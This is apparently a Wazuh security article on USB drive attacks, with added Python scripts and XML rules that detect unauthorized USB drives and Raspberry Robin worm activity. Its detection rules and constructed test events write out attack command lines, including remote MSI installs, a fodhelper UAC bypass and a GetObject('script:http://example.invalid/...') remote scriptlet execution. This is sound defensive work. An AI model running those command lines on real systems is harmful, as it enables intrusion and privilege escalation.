USB drive attacks represent a major cybersecurity threat, exploiting the everyday use of USB devices to deliver malware and circumvent traditional network security measures. These attacks result in data breaches, financial losses, and operational disruptions, with lasting impacts on an organization's reputation. An example is the Stuxnet worm discovered in 2010, malware designed to target industrial control systems, specifically Iran's nuclear enrichment facilities. It exploited several zero-day vulnerabilities and spread primarily via USB drives, making it one of the first examples of a cyberattack with real-world physical effects. Stuxnet exposed the risks of removable media and raised global awareness of cybersecurity threats to critical infrastructure.
How USB drive attacks propagate
Attackers use various methods to deliver malicious payloads via USB drives, targeting both individuals and organizations.
- Drop attacks: Infected USB drives are deliberately left in public places, such as parking lots, to entice victims to plug them in and infect their computers.
- Mail-based attacks: USB drives are sent to targets by mail, disguised as promotional items or legitimate devices, to trick them into plugging them into their systems.
- Social engineering: Attackers use psychological tactics to persuade victims to connect infected USB drives to their computers.
- Unsolicited plugging: Attackers plug infected USB drives into unattended systems, spreading malware without any victim interaction.
How USB drive attacks work
USB drive attacks typically follow a multi-step process to infiltrate systems and cause damage.
- Reconnaissance: Attackers research their target to identify potential vulnerabilities. In this case, they may gather information about the organization, its employees, and its operational environment to determine the likelihood of someone using a USB drive.
- Weaponization: Threat actors prepare the USB drive by embedding malware. This can be done by directly infecting the drive or by crafting a seemingly benign file, such as a document, video, or image, that contains hidden malicious code.
- Delivery: Attackers distribute the infected USB drive to targets by dropping it in public places, giving it away as a promotional item, or using social engineering to deliver it.
- Exploitation: When the target connects the USB drive, the malware is activated automatically or through user interaction, exploiting system vulnerabilities.
- Installation: The malware is installed on the target system and gains persistence. This step allows the attacker to maintain control of the infected system even if it is rebooted or disconnected.
- Command and Control (C2): The malware communicates with the attacker's server. This allows the attacker to issue commands, exfiltrate data, or deploy additional payloads.
- Actions on Objectives: The attackers achieve their goals, such as stealing sensitive data, deploying ransomware, or establishing persistent access for future exploitation.
Figure 1: Steps showing how USB drive attacks work.
Improve your cybersecurity posture against USB drive attacks with Wazuh
Wazuh is an open source security platform that helps organizations detect and respond to security threats by monitoring system activities, from informational events to critical incidents. Organizations can proactively prevent breaches and safeguard sensitive data by monitoring USB activity with Wazuh.
Monitoring USB drive activities in Windows using Wazuh
Wazuh monitors USB drive activities on Windows endpoints using the Audit PNP Activity feature. This feature logs Plug and Play (PnP) events, which helps identify when USB drives are connected. It is available on Windows 10 Pro, Windows 11 Pro, Windows Server 2016, and later versions.
Organizations can configure Wazuh to detect specific system events and monitor USB-related events, focusing in particular on Windows event ID 6416, which indicates that an external device has been connected. Security administrators can detect USB device connections by creating Wazuh custom rules that identify potential security incidents.
The next step consists of creating a Constant Database (CDB) list of the approved devices' unique device identifiers (DeviceID). This list allows Wazuh to differentiate between authorized and unauthorized devices, generating alerts for both categories. For instance, when an authorized USB drive is plugged in, it triggers a lower-level alert, whereas unauthorized connections can generate high-severity alerts that indicate a potential security breach.
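The following is an added example, not Wazuh's own code, showing the logic the event ID 6416 rule and the CDB allow-list implement: it parses the DeviceID from a decoded 6416 event, scopes the check to USB mass storage, looks the identifier up in a CDB-format list and assigns a lower or higher alert level. The event layout approximates the JSON the Wazuh Windows event channel decoder produces (`win.system`, `win.eventdata`); the `deviceId` and `className` field names, the two alert levels and all device identifiers are assumptions or constructed sample values.

```python
"""Allow-list check for Windows event ID 6416 (a new external device was recognized).

Added example, not Wazuh code. It mirrors two things described in the text: the
custom rule keyed on event 6416 and the CDB list of approved DeviceIDs. Event
structure approximates decoded Wazuh JSON; alert levels are constructed values.
"""
from __future__ import annotations
import re

# Constructed CDB list in Wazuh's `key:value` text format. Keys are the full
# PnP DeviceIDs of approved drives; values are free-form labels.
APPROVED_CDB = """\
USBSTOR\\Disk&Ven_Kingston&Prod_DataTraveler_3.0&Rev_PMAP\\0123456789ABCDEF&0:finance-backup-01
USBSTOR\\Disk&Ven_SanDisk&Prod_Ultra&Rev_1.00\\4C530001234567890123&0:it-imaging-02
"""

LEVEL_AUTHORIZED = 3     # constructed: informational alert for an approved drive
LEVEL_UNAUTHORIZED = 12  # constructed: high-severity alert for an unknown drive
USBSTOR_PREFIX = "USBSTOR\\"


def parse_cdb(text: str) -> dict[str, str]:
    """Parse `key:value` lines (key up to the first ':'); blank and '#' lines are ignored."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(":")
        entries[key] = value
    return entries


def device_details(device_id: str) -> dict[str, str] | None:
    """Split a USBSTOR DeviceID into vendor, product, revision and serial; None for other devices."""
    m = re.match(r"USBSTOR\\Disk&Ven_([^&]*)&Prod_([^&]*)&Rev_([^\\]*)\\([^&]*)&\d+$", device_id)
    if not m:
        return None
    return {"vendor": m.group(1), "product": m.group(2), "revision": m.group(3), "serial": m.group(4)}


def classify_event(event: dict, approved: dict[str, str]) -> dict | None:
    """Return an alert record for a 6416 USB storage connection, or None if out of scope."""
    if event.get("win", {}).get("system", {}).get("eventID") != "6416":
        return None
    device_id = event["win"]["eventdata"].get("deviceId", "")
    # 6416 fires for every PnP device (hubs, keyboards, ...); only mass storage is in scope.
    if not device_id.startswith(USBSTOR_PREFIX):
        return None
    label = approved.get(device_id)
    return {
        "rule_level": LEVEL_AUTHORIZED if label else LEVEL_UNAUTHORIZED,
        "authorized": label is not None,
        "label": label,
        "computer": event["win"]["system"].get("computer"),
        **(device_details(device_id) or {}),
    }


def make_event(computer: str, device_id: str, class_name: str) -> dict:
    """Build a constructed event shaped like decoded Wazuh JSON for event ID 6416."""
    return {"win": {"system": {"eventID": "6416", "computer": computer, "channel": "Security"},
                    "eventdata": {"deviceId": device_id, "className": class_name}}}


# Constructed sample events: an approved drive, an unknown drive, and a non-storage device.
SAMPLE_EVENTS = [
    make_event("WS-FIN-07", "USBSTOR\\Disk&Ven_Kingston&Prod_DataTraveler_3.0&Rev_PMAP\\0123456789ABCDEF&0", "DiskDrive"),
    make_event("WS-FIN-07", "USBSTOR\\Disk&Ven_Generic&Prod_Flash_Disk&Rev_8.07\\AA04012700013494&0", "DiskDrive"),
    make_event("WS-FIN-07", "USB\\VID_1234&PID_5678\\0000000000&0", "HIDClass"),
]

if __name__ == "__main__":
    approved = parse_cdb(APPROVED_CDB)
    for ev in SAMPLE_EVENTS:
        print(classify_event(ev, approved))
```

The `USBSTOR\` scoping matters in practice: event 6416 is raised for every newly recognized PnP device, so a rule that does not narrow the DeviceID will alert on hubs and keyboards as well as drives.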
Figure 2: USB drive plug-in events on a monitored Windows endpoint.
Figure 3: Authorized USB drive event.
Figure 4: Unauthorized USB drive event.
Threat detection use case: Detecting Raspberry Robin USB drive activities
Wazuh provides a solution to mitigate USB-related threats such as Raspberry Robin, a Windows-based worm.
Raspberry Robin targets industries like oil, gas, transportation, and tech, causing operational disruptions. It spreads via disguised .lnk files, gains persistence by updating the UserAssist registry key, and mimics legitimate folders. The worm uses legitimate Windows processes such as msiexec.exe, rundll32.exe, odbcconf.exe, and fodhelper.exe to execute, persist, and download additional malicious components. Its reliance on TOR-based command and control (C2) servers for outbound communication adds stealth and complicates detection.
Wazuh detects Raspberry Robin by monitoring registry modifications, unusual command execution patterns, and suspicious use of system binaries. Its real-time file integrity monitoring and threat detection rules identify malicious activity, enabling a swift response to mitigate potential disruptions.
Wazuh detects and mitigates Raspberry Robin by monitoring and responding to suspicious activity such as:
- Anomalous cmd.exe activity: terminating suspicious processes or isolating affected endpoints.
- Flagging msiexec.exe downloads from obscure domains, blocking the connections, and alerting administrators.
- Detecting UAC bypass via fodhelper.exe, terminating the process, and notifying administrators.
- Blocking unusual outbound connections by rundll32.exe and dllhost.exe.
Below is a sample custom rule configuration that detects possible Raspberry Robin activity.
<!-- Custom rules go in /var/ossec/etc/rules/local_rules.xml on the Wazuh server, inside a <group>
     element (the group name below is an example). Rules 100101, 100103 and 100105 are children of
     built-in rule 61603 (Sysmon event ID 1, process creation); rule 100100 is a child of rule 92004.
     Every <field> in a rule must match for the rule to fire. -->
<group name="windows,sysmon,">
  <!-- cmd.exe launching a nested cmd through /R, /V or /C, the worm's launcher pattern -->
  <rule id="100100" level="12">
    <if_sid>92004</if_sid>
    <field name="win.eventdata.image" type="pcre2">(?i)cmd.exe$</field>
    <field name="win.eventdata.commandLine" type="pcre2">(?i)cmd.exe.+((/r)|(/v.+/c)|(/c)).*cmd</field>
    <description>Possible Raspberry Robin execution on $(win.system.computer)</description>
    <mitre>
      <id>T1059.003</id>
    </mitre>
  </rule>
  <!-- msiexec.exe quietly installing a package fetched over HTTP(S) -->
  <rule id="100101" level="7">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.image" type="pcre2">(?i)msiexec.exe$</field>
    <field name="win.eventdata.commandLine" type="pcre2">(?i)msiexec.*(/q|-q|/i|-i).*(/q|-q|/i|-i).*http[s]{0,1}://.+[.msi]{0,1}</field>
    <description>msiexec.exe downloading and executing packages on $(win.system.computer)</description>
    <mitre>
      <id>T1218.007</id>
    </mitre>
  </rule>
  <!-- cmd, PowerShell or rundll32 spawned by fodhelper.exe (auto-elevated binary) -->
  <rule id="100103" level="12">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.originalFileName" type="pcre2">(?i)(cmd|powershell|rundll32).exe</field>
    <field name="win.eventdata.parentImage" type="pcre2">(?i)fodhelper.exe</field>
    <description>Use of fodhelper.exe to bypass UAC on $(win.system.computer)</description>
    <mitre>
      <id>T1548.002</id>
    </mitre>
  </rule>
  <!-- regsvr32/rundll32/dllhost running a remote scriptlet via GetObject("script:...").
       Parentheses and dots in the literal are escaped so pcre2 matches them as text
       rather than treating them as groups and wildcards. -->
  <rule id="100105" level="10">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.commandLine" type="pcre2">(regsvr32.exe|rundll32.exe|dllhost.exe).*";document\.write\(\);GetObject\("script:.*\)\.Exec\(\)</field>
    <description>Possible Raspberry Robin execution on $(win.system.computer)</description>
    <mitre>
      <id>T1218.011</id>
    </mitre>
  </rule>
</group>
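To see what the four rule patterns above actually match, here is an added example (not Wazuh code) that replays them over constructed Sysmon-style process-creation events with Python's `re`, which treats these particular patterns the same way pcre2 does. It applies Wazuh's AND semantics (every `<field>` must match) and shows that a plain `cmd.exe /c dir` or a local `msiexec /i` does not fire, while the nested-cmd, remote-MSI, fodhelper-child and `GetObject("script:...")` cases do. The `<if_sid>` parent match is assumed to have already happened; all command lines, paths and hosts are constructed, and the parentheses in the rule 100105 literal are escaped as in the listing above.

```python
"""Replay the page's Raspberry Robin rule patterns against constructed Sysmon-style events.

Added example, not Wazuh code. Wazuh evaluates each <field> of a rule as a pcre2
search and fires the rule only when all of them match; this mirrors that offline.
"""
from __future__ import annotations
import re

# Rule id -> (level, {event field: pcre2 pattern}), transcribed from the page's rules.
RULES = {
    100100: (12, {
        "image": r"(?i)cmd.exe$",
        "commandLine": r"(?i)cmd.exe.+((/r)|(/v.+/c)|(/c)).*cmd",
    }),
    100101: (7, {
        "image": r"(?i)msiexec.exe$",
        "commandLine": r"(?i)msiexec.*(/q|-q|/i|-i).*(/q|-q|/i|-i).*http[s]{0,1}://.+[.msi]{0,1}",
    }),
    100103: (12, {
        "originalFileName": r"(?i)(cmd|powershell|rundll32).exe",
        "parentImage": r"(?i)fodhelper.exe",
    }),
    100105: (10, {
        # Parentheses/dots of the script literal escaped so they match as text.
        "commandLine": r'(regsvr32.exe|rundll32.exe|dllhost.exe).*";document\.write\(\);GetObject\("script:.*\)\.Exec\(\)',
    }),
}


def matching_rules(event: dict) -> list[int]:
    """Ids of rules whose every field pattern matches the event (AND logic, like Wazuh)."""
    fired = []
    for rule_id, (_level, fields) in RULES.items():
        if all(re.search(pattern, event.get(name, "")) for name, pattern in fields.items()):
            fired.append(rule_id)
    return fired


def highest_level(event: dict) -> int:
    """Highest alert level among matching rules, 0 if nothing matched."""
    return max((RULES[r][0] for r in matching_rules(event)), default=0)


# Constructed events (not captured telemetry); hosts and paths are placeholders.
EVENTS = {
    "benign_cmd": {
        "image": r"C:\Windows\System32\cmd.exe",
        "commandLine": r"cmd.exe /c dir C:\Temp",
    },
    "nested_cmd": {
        "image": r"C:\Windows\System32\cmd.exe",
        "commandLine": r'cmd.exe /R CMD<"C:\Users\Public\stage1.txt"',
    },
    "msiexec_remote": {
        "image": r"C:\Windows\System32\msiexec.exe",
        "commandLine": "msiexec.exe /q /i http://example.invalid/update.msi",
    },
    "msiexec_local": {
        "image": r"C:\Windows\System32\msiexec.exe",
        "commandLine": r"msiexec.exe /i C:\installers\app.msi /quiet",
    },
    "fodhelper_child": {
        "image": r"C:\Windows\System32\cmd.exe",
        "originalFileName": "Cmd.Exe",
        "parentImage": r"C:\Windows\System32\fodhelper.exe",
        "commandLine": "cmd.exe /c whoami",
    },
    "rundll32_script": {
        "image": r"C:\Windows\System32\rundll32.exe",
        "commandLine": 'rundll32.exe C:\\Users\\Public\\a.tmp,Entry ";document.write();GetObject("script:http://example.invalid/s").Exec()',
    },
}

if __name__ == "__main__":
    for name, ev in EVENTS.items():
        print(f"{name:16} -> rules {matching_rules(ev)} level {highest_level(ev)}")
```

Replaying rules against a small corpus of known-benign and known-bad command lines like this is a cheap way to check a regex before it reaches production, particularly for rule 100101, which depends on two option flags and an HTTP URL appearing in order.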
Figure 5: Raspberry Robin IoCs and behaviors detected on a monitored Windows endpoint.
Figure 6: An alert showing the Raspberry Robin IoCs detected on a monitored Windows endpoint.
For more details on detecting the Raspberry Robin worm using Wazuh, please see this blog post.
Monitoring USB drives in Linux using Wazuh
USB drives can also introduce security risks to Linux endpoints as potential vectors for malware and unauthorized data access. udev is a Linux system utility that automatically detects and manages external devices, such as USB drives, when they are plugged in. It creates the necessary device files in the /dev directory so that the system can interact with them. Administrators can create custom udev rules that generate detailed events, providing insight into USB activity. Wazuh has built-in rules for USB monitoring, but udev-generated events provide richer details, improving threat detection.
We configure udev rules on our Linux endpoints to trigger a logging script whenever a USB device is connected. The Wazuh agent must be set up to read the JSON log file produced by the logging script, allowing it to process and analyze USB activity.
Similar to the Windows USB drive monitoring, you need a constant database (CDB) list of authorized USB device serial numbers. Wazuh compares incoming connections against this list, triggering alerts for unauthorized devices.
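As an added example of the logging script this procedure calls for (not the script from the page or from Wazuh), the following Python program is meant to be invoked by udev via `RUN+=` and appends one JSON object per line to a log file that the Wazuh agent then reads with `<log_format>json</log_format>`. udev hands device properties to `RUN` programs as environment variables, and the names used here (`ACTION`, `DEVNAME`, `ID_BUS`, `ID_SERIAL_SHORT`, and so on) are standard udev properties; the udev rule quoted in the docstring, the log path and the sample environment are my assumptions and constructed values.

```python
#!/usr/bin/env python3
"""udev RUN+= helper that appends one JSON line per USB disk plug/unplug event.

Added example, not Wazuh's script. Assumed wiring (mine, not the page's):
    ACTION=="add|remove", SUBSYSTEM=="block", ENV{ID_BUS}=="usb", RUN+="/usr/local/bin/usb-log.py"
The Wazuh agent reads LOG_PATH with a <localfile> whose <log_format> is json.
"""
from __future__ import annotations
import json
import os
import socket
import sys
from datetime import datetime, timezone

LOG_PATH = "/var/log/usb-events.json"  # assumed location, matched by the agent's <localfile>

# udev property -> key in the JSON record (all standard udev property names)
FIELDS = {
    "ACTION": "action",
    "DEVNAME": "device",
    "DEVTYPE": "devtype",
    "ID_VENDOR": "vendor",
    "ID_MODEL": "model",
    "ID_VENDOR_ID": "vendor_id",
    "ID_MODEL_ID": "product_id",
    "ID_SERIAL_SHORT": "serial",
    "ID_FS_LABEL": "fs_label",
}


def is_usb_storage(env: dict) -> bool:
    """Whole disks on the USB bus only; partitions would duplicate each plug-in event."""
    return (env.get("SUBSYSTEM") == "block"
            and env.get("ID_BUS") == "usb"
            and env.get("DEVTYPE") == "disk")


def build_record(env: dict) -> dict | None:
    """Map the udev environment to a flat record Wazuh can decode; None if not a USB disk."""
    if not is_usb_storage(env):
        return None
    record = {
        "timestamp": datetime.now(timezone.utc).isoformat(),
        "source": "udev-usb-monitor",
        "host": socket.gethostname(),
    }
    for udev_key, json_key in FIELDS.items():
        if udev_key in env:
            record[json_key] = env[udev_key]
    # CDB lookups compare exact strings, so normalise the serial before it reaches the list.
    if "serial" in record:
        record["serial"] = record["serial"].strip().upper()
    return record


def to_json_line(record: dict) -> str:
    """One compact JSON object per line, the shape Wazuh's json log_format expects."""
    return json.dumps(record, separators=(",", ":"), sort_keys=True)


def main() -> int:
    record = build_record(dict(os.environ))
    if record is None:
        return 0
    with open(LOG_PATH, "a", encoding="utf-8") as fh:
        fh.write(to_json_line(record) + "\n")
    return 0


# Constructed udev environment for a plug-in event (not captured from a real host).
SAMPLE_ENV = {
    "ACTION": "add", "SUBSYSTEM": "block", "DEVTYPE": "disk", "DEVNAME": "/dev/sdb",
    "ID_BUS": "usb", "ID_VENDOR": "Kingston", "ID_MODEL": "DataTraveler_3.0",
    "ID_VENDOR_ID": "1234", "ID_MODEL_ID": "5678", "ID_SERIAL_SHORT": "0123456789abcdef",
}

if __name__ == "__main__":
    sys.exit(main())
```

Writing the normalised `serial` field is what makes the CDB comparison on the server side reliable: the Wazuh rule can then look `serial` up in the list of authorized serial numbers and raise the higher-level alert only when the lookup fails.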
Figure 7: USB drive alerts for a monitored Linux endpoint.
Figure 8: An unauthorized USB drive event on a monitored Linux endpoint.
The blog post on Monitoring USB drives in Linux using Wazuh provides more information on monitoring USB drives plugged into Linux endpoints.
Monitoring USB drives in macOS using Wazuh
You can use a custom script to log critical events related to USB devices on macOS endpoints and then configure Wazuh to monitor these events. Administrators can extract information such as connection and disconnection events, vendor IDs, product IDs, and serial numbers of the USB drives plugged in. The script interacts with macOS's I/O Kit framework to gather USB device information, which is then formatted as JSON and saved to a log file. The log data generated by this custom script is sent to the Wazuh server for analysis by the Wazuh agent.
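The page does not show its macOS script, so the following is an added example of one way to derive the connection and disconnection events it describes: rather than calling I/O Kit directly, it takes periodic snapshots from `system_profiler SPUSBDataType -json` (which is itself backed by I/O Kit) and diffs them. The tree layout it parses (`_name`, `vendor_id`, `product_id`, `serial_num`, nested `_items`) is my reading of that command's output, and the two snapshots below are constructed, not captured from a real Mac.

```python
"""Detect USB connect/disconnect events on macOS by diffing device snapshots.

Added example, not the page's script. Assumes snapshots come from
`system_profiler SPUSBDataType -json`; the sample trees below are constructed.
"""
from __future__ import annotations
import json
import subprocess
from datetime import datetime, timezone


def snapshot_from_system_profiler() -> dict:
    """Take a live snapshot on a real Mac (not used by the offline sample data below)."""
    out = subprocess.run(["system_profiler", "SPUSBDataType", "-json"],
                         capture_output=True, text=True, check=True).stdout
    return json.loads(out)


def walk(nodes: list) -> dict[str, dict]:
    """Flatten the USB tree into {device_key: attributes}; hubs/controllers lacking product_id are skipped."""
    devices = {}
    for node in nodes:
        if "product_id" in node:
            key = f"{node.get('vendor_id', '?')}:{node.get('product_id', '?')}:{node.get('serial_num', '')}"
            devices[key] = {
                "name": node.get("_name"),
                "vendor_id": node.get("vendor_id"),
                "product_id": node.get("product_id"),
                "serial": node.get("serial_num"),
            }
        devices.update(walk(node.get("_items", [])))
    return devices


def diff_snapshots(previous: dict, current: dict) -> list[dict]:
    """One JSON-ready event per device that appeared or disappeared between two snapshots."""
    ts = datetime.now(timezone.utc).isoformat()
    events = []
    for key in sorted(current.keys() - previous.keys()):
        events.append({"timestamp": ts, "event": "connected", **current[key]})
    for key in sorted(previous.keys() - current.keys()):
        events.append({"timestamp": ts, "event": "disconnected", **previous[key]})
    return events


# Constructed snapshots: a keyboard present in both, a flash drive present only in AFTER.
KEYBOARD = {"_name": "USB Keyboard", "vendor_id": "0x1234  (Example Vendor)",
            "product_id": "0x0001", "serial_num": "KB-CONSTRUCTED-01"}
FLASH = {"_name": "Flash Drive", "vendor_id": "0x1234  (Example Vendor)",
         "product_id": "0x5678", "serial_num": "FD-CONSTRUCTED-01"}
BEFORE = {"SPUSBDataType": [{"_name": "USB Bus", "_items": [KEYBOARD]}]}
AFTER = {"SPUSBDataType": [{"_name": "USB Bus", "_items": [KEYBOARD, FLASH]}]}

if __name__ == "__main__":
    for event in diff_snapshots(walk(BEFORE["SPUSBDataType"]), walk(AFTER["SPUSBDataType"])):
        print(json.dumps(event, separators=(",", ":")))  # append these lines to the agent's log file
```

Polling snapshots means an unplug that happens between two polls is reported late, so the interval should be short; the serial field is what the server-side CDB list of authorized drives is compared against, exactly as in the Windows and Linux cases.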
The blog post on Monitoring USB drives in macOS using Wazuh shows the steps to monitor USB drives on macOS endpoints.
Figure 9: USB drive alerts on a monitored macOS endpoint.
Figure 10: Unauthorized USB drive alert on a monitored macOS endpoint.
Conclusion
USB drive attacks pose a security risk across all major operating systems, enabling malware propagation and giving malicious actors unauthorized access.
Wazuh offers various detection mechanisms that increase the chances of detecting USB drive attacks and mitigating their potential impact. Organizations can improve their cybersecurity by integrating these detection methods and enforcing strict USB access policies.